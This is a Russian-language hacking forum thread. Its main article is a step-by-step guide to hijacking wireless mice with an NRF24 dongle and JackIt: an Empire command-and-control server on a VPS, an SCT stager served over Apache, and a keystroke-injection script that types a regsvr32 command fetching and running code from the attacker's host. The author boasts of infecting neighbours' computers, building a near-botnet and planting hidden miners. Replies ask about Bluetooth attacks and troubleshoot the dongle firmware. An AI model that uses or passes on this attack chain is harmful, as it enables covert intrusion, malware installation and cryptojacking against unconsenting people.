• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья Необычный взлом! с помощью чипа NRF24 и Hackrf-one или просто SDR тунер

Ondrik8

Ondrik8

prodigy
08.11.2016
1 006
2 988
"А не написать ли мне статью?" Ходил я с этими мыслями три дня и четыре ночи с ней спал .... Авось кто нить прочитает да и дополнит чем нибудь дельным.... Эх оглянувшись на все, думаю все же напишу-ка))

Этот взлом не раз описывался в бурж-нете да и на хабре была но все же интересно пройти через все невзгоды самому и подробно описать так сказать весь процесс создания этой атаки.

Вы спросите а нах нам еще про это читать когда все и так уже описано не раз и по русски, нет, отвечу я вам, методика мне показалось очень актуальной и не умрет, а наоборот будет цвести и пахнуть с прогрессом что нам и на руку!

И так поехали нам понадобится VPS на базе убунту или дебиан что в принципе одно и тоже с внешним айпи адресом желательно где нить в Гватемале!)) или в любой другой стране Тайвань, в идеале там где обитают попуасы которые про Россию слышали только раз в жизни и то не помнят где и от кого!))) Ну это о анонимности, мы же занимаемся не благим делом. ДА!? Сетевые разбойники......

Ноутбук, нетбук с не убитым аккумулятором, а то будет конец фильма на самом интересном месте, кто смотрел "жулиану" в 90-ых тот меня поймет или "просто Мария" да.. Как сейчас помню как я в голготках и в юном возрасте кулаками, об колени бил себя в растройстве по вечерам что не узнал как там дальше в сериале найдет ли Круз Кастилио потерявшуюся Идн или нет ...

О главном опишу два варианта бюджетный и дорогой начну с первого покупаем на али вот эту стоит всего 5 баксов доставка быстрая продавашка вроде шустренько все отправляет!

Получили, прекрасно нужно будет припаять к нему антенну для большего радиуса действия вот как в итоге должно получится вот Антену можно любую на 2.4 Ггц подойдет от вайфай адаптера роутера и т.д. они тоже на этих частотах работают в основном есть конечно же и на 5Ггц вайфай но в наших широтах он встречается редко...

Далее идем на наш (Гватемальский) ВПС и устанавливаем софт, а именно нынче в тренде и сервис Apache2 который устанавливается простой командой:sudo apt-get install apache2 ну и запускаем его! sudo service apache2 start и еще очень важный момент устанавливаем утилиту SCREEN она предназначена для того чтобы запущенный процесс, скрипт не закрывался когда вы покидаете окно терминала управления вашим ВПС (то есть работал сутками) без Вашего присутствия это очень важный момент!

Итак идем в папку с empire устанавливаем и запускаем утилиту screen командой screen -S empire (создастся новая вкладка для него чтобы он фурычил без Вас)запускаем ./empire создаем: usestager windows/launcher_sct на мой взгляд он самый без палевный в данный момент командой INFO (маленькими) узнаем его настройки в строке OutFile вбиваем путь до сервиса апач /var/www/html/ название файла.sct настраиваем Listener подробно оставаться на этом не буду на борде много инфы на эту тему запуск, установка и т.д. по желанию можно настроить autorun persistence что бы Ваш зверек оставался в (вражеской)системе подольше)) описано нажимаем CNTRL+A и D закрывая этим самым вкладку с empire . Идем домой на родной раб. стол подклчаем наш девайс-донгл качаем для него утилиту устанавливаем ! В папке с Jackit есть файлик pspwn открываем его в leafpad-e все стираем и пишем (ох сколько я часов потратил на все это что бы понять что туда писать)
Код:
GUI r
DELAY 1000       ждем 1000 мл.сек
WIN STRING r     запускается run
DELAY 300          ждет (так как машины не у всех быстрые, покааа сообразит))
SHIFT ALT          меняется раскладка клавиатуры т.к. у всех по умолч. стоит русская
DELAY 300
STRING regsvr32 /s /n /u /i:http://(IP-вашего ВПС)/(имя файла которого мы создали в empire).sct scrobj.dll   << самый вкусный процесс в run печатается этот текст)))
ENTER     
DELAY 400
STRING exit         ну Вы поняли..
ENTER
Сохраняем запускаем скрипт jackit командой : ./jackit.py --script pspwn
ждем... Мне лично долго ждать не пришлось дело было вечером выходной много-этажка... поймал 4 -ех мышей запустил атаку 3 машины попались!)) поднялся на пару этажей выше еще парочка из 5 попались зашел на ВПС а там уже почти БОТНЕТ))) закинул скрытые майнеры пожинаю плоды, по двору правда еще не гулял...

Прошла неделя.... Я задался вопросом "так почему же ловит к примеру 5-6 мышей а заражается 2-3 машины?" Думаю Вы уже догадались что у нас в продаже идут (радио) мышки отдельно от клавиатуры и я нашел ответ как заставить вражеский курсор набирать на экранной клавиатуре (наш) текст в run powershell ... об этом позже, уже понадобится hackrf , GNUradio это есть дорогой вариант исполнения загрузки пэйлода

Для эффективности сего пред ставленого Вам метода можно еще прикупить на 2.4Ghz дабы покрыть все радио мыши в районе данный девайс уже спешит ко мне из Китая как приедет отпишу эффективность

ПС: моя первая статья, просьба сильно ногами не пинать меня т.к. за сочинения в школе у меня были двойки((( Простите за ВОДУ в начале! и продолжение следует так у меня в арсенале еще имеется PROXMARK, HACKRF-one и много чего еще интересного ..
 
Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 453
4 289
Вот крутая статья, правда:cool:

Как сейчас помню как я в голготках и в юном возрасте кулаками, об колени бил себя в растройстве по вечерам что не узнал как там дальше в сериале найдет ли Круз Кастилио потерявшуюся Идн или нет ...
Тут, вообще проникся)))

Не затягивай с продолжением...:)
 
OMiay

OMiay

Member
12.12.2016
17
18
А как это выглядит на стороне жертвы? Сидит такой чел, шпилит в танки, а тут бах, игра сворачивается, открывается powershell и пишется какой-то странный код?
 
Ondrik8

Ondrik8

prodigy
08.11.2016
1 006
2 988
А как это выглядит на стороне жертвы? Сидит такой чел, шпилит в танки, а тут бах, игра сворачивается, открывается powershell и пишется какой-то странный код?
на счет танков не знаю.. но из рабочего стола точно прокатывает! По времени все происходит за секунды
можно модифицировать поэйлод вверху добавить команду на сворачивания игр , приложений!
 
A

antonchik

Статья супер. А вот ваши примочки в единый реестр нотификаций о характеристиках шифровальных (криптографических) средств и товаров, их содержащих случайно не попадут?
 
Ondrik8

Ondrik8

prodigy
08.11.2016
1 006
2 988
Статья супер. А вот ваши примочки в единый реестр нотификаций о характеристиках шифровальных (криптографических) средств и товаров, их содержащих случайно не попадут?
я думаю что нет! Вы представьте себе как взбунтуются любители радиоуправляемых гаджетов, например квадрокоптеров ..
 
I

Inject0r

крутая статья, пиши еще, желательно со скринами)
 
C

CyanFox

А с БТ мышами/клавами есть способ хакинга? Там вроде шифрование, нет?
 
Ondrik8

Ondrik8

prodigy
08.11.2016
1 006
2 988
А с БТ мышами/клавами есть способ хакинга? Там вроде шифрование, нет?
есть, способы! и не один! БТ-интересный протокол помню случай был ауди ку-5 по БТ даже открывали.. из техники нужен только ноут с БТ , Кали а лучше Попугай, софт из github.com
 
  • Нравится
Реакции: Tihon49 и sosiskapi
B

Breed

Заблокирован
18.06.2017
194
242
Кали а лучше Попугай
А можно уточнить: предпочтение Парроту отдано из-за бОльшего функционала или он более заточен под описываемые цели?
Я только собираюсь поэкспериментировать с ним (пока что в ВМ), но обратил внимание, что его аппетиты на ресурсы чуть меньше.
 
Ondrik8

Ondrik8

prodigy
08.11.2016
1 006
2 988
А можно уточнить: предпочтение Парроту отдано из-за бОльшего функционала или он более заточен под описываемые цели?
Я только собираюсь поэкспериментировать с ним (пока что в ВМ), но обратил внимание, что его аппетиты на ресурсы чуть меньше.
да меньше жрет ресурсов из-за оболочки "мате" я про бывал и на кали и с попугаем полет хороший, функционал у него больше просто потому что инструментов больше ...
 
  • Нравится
Реакции: Breed
K

krastyka

Member
12.07.2017
19
0
Ondrik8, я так понял для всего этого можно использовать и тв тюнер на чипе RTL2832 ? или он будет работать только на прием сигнала и запустить атаку через него не получится ?
 
Ondrik8

Ondrik8

prodigy
08.11.2016
1 006
2 988
получится просто снифер но с мышками на 23-26мгц
 
K

krastyka

Member
12.07.2017
19
0
получится просто снифер но с мышками на 23-26мгц
Ну как собственно я и предполагал ;(
Эх придутся две недели ждать из Китая ;(
[doublepost=1501263081,1500014051][/doublepost]Эх ну вот и загвоздка при установке nrf-research-firmware в команде sudo make install ошибка

./prog/usb-flasher/usb-flash.py bin/dongle.bin
make: execvp: ./prog/usb-flasher/usb-flash.py: Permission denied
Makefile:27: recipe for target 'install' failed
make: *** [install] Error 127
Может кто помочь?

P.S. донгл CrazyRadio
[doublepost=1501265807][/doublepost]upd сори затупил все решилось командой chmod +x
 
A

Alizonjohn

Всем привет! Тоже проблема: при установке nrf-research-firmware. Команда make выполняется нормально. А следующая команда:
sudo make install возвращает ошибку:

./prog/usb-flasher/usb-flash.py bin/dongle.bin
[2017-09-02 16:55:16.263] Looking for a compatible device that can jump to the Nordic bootloader
[2017-09-02 16:55:16.290] Looking for a device running the Nordic bootloader
[2017-09-02 16:55:17.293] No compatbile device found
Traceback (most recent call last):
File "./prog/usb-flasher/usb-flash.py", line 92, in <module>
raise Exception('No compatible device found.')
Exception: No compatible device found.
Makefile:27: recipe for target 'install' failed
make: *** [install] Error 1

Для процесса использую Ubuntu 16.04 LTS десктопную.
Судя по надписи No compatbile device found проблема в самом устройстве. Вот и возник вопрос: у меня устройство nRF21LU1 (без плюсика). А на гитхабе идет разговор про nRF24LU1+

Как думаете, в этом различии может быть дело?
 

Вложения

Ondrik8

Ondrik8

prodigy
08.11.2016
1 006
2 988
Всем привет! Тоже проблема: при установке nrf-research-firmware. Команда make выполняется нормально. А следующая команда:
sudo make install возвращает ошибку:

./prog/usb-flasher/usb-flash.py bin/dongle.bin
[2017-09-02 16:55:16.263] Looking for a compatible device that can jump to the Nordic bootloader
[2017-09-02 16:55:16.290] Looking for a device running the Nordic bootloader
[2017-09-02 16:55:17.293] No compatbile device found
Traceback (most recent call last):
File "./prog/usb-flasher/usb-flash.py", line 92, in <module>
raise Exception('No compatible device found.')
Exception: No compatible device found.
Makefile:27: recipe for target 'install' failed
make: *** [install] Error 1

Для процесса использую Ubuntu 16.04 LTS десктопную.
Судя по надписи No compatbile device found проблема в самом устройстве. Вот и возник вопрос: у меня устройство nRF21LU1 (без плюсика). А на гитхабе идет разговор про nRF24LU1+

Как думаете, в этом различии может быть дело?
Необычный взлом! с помощью чипа NRF24 и Hackrf-one или просто SDR тунер
 
A

Alizonjohn

Нет, я не про это. Сам Jackit работает, но выдает следующее:

JackIt Version 1.00
Created by phikshun, infamy
[!] Cannot find Crazy PA USB dongle.
[!] Please make sure you have it preloaded with the mousejack firmware.

Соответственно, я думаю что проблема в том, что не прошилась новая прошивка в донгл. В инструкции к скрипту Jackit сказано, что перед использованием, нужно накатить прошивку от бастилий: You will also need to flash the firmware of the adapter using . Вот тут и возникает проблема, когда прошиваешь их прошику скрипт сообщает No compatbile device found.

При этом windows отлично видит этот usb-донгл, пикает при его подключении и определяет его как HID клавиатуру. А Ubuntu при подключении его вообще никаких звуков не издает и не шевелится. Может сам донгл косячный?
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб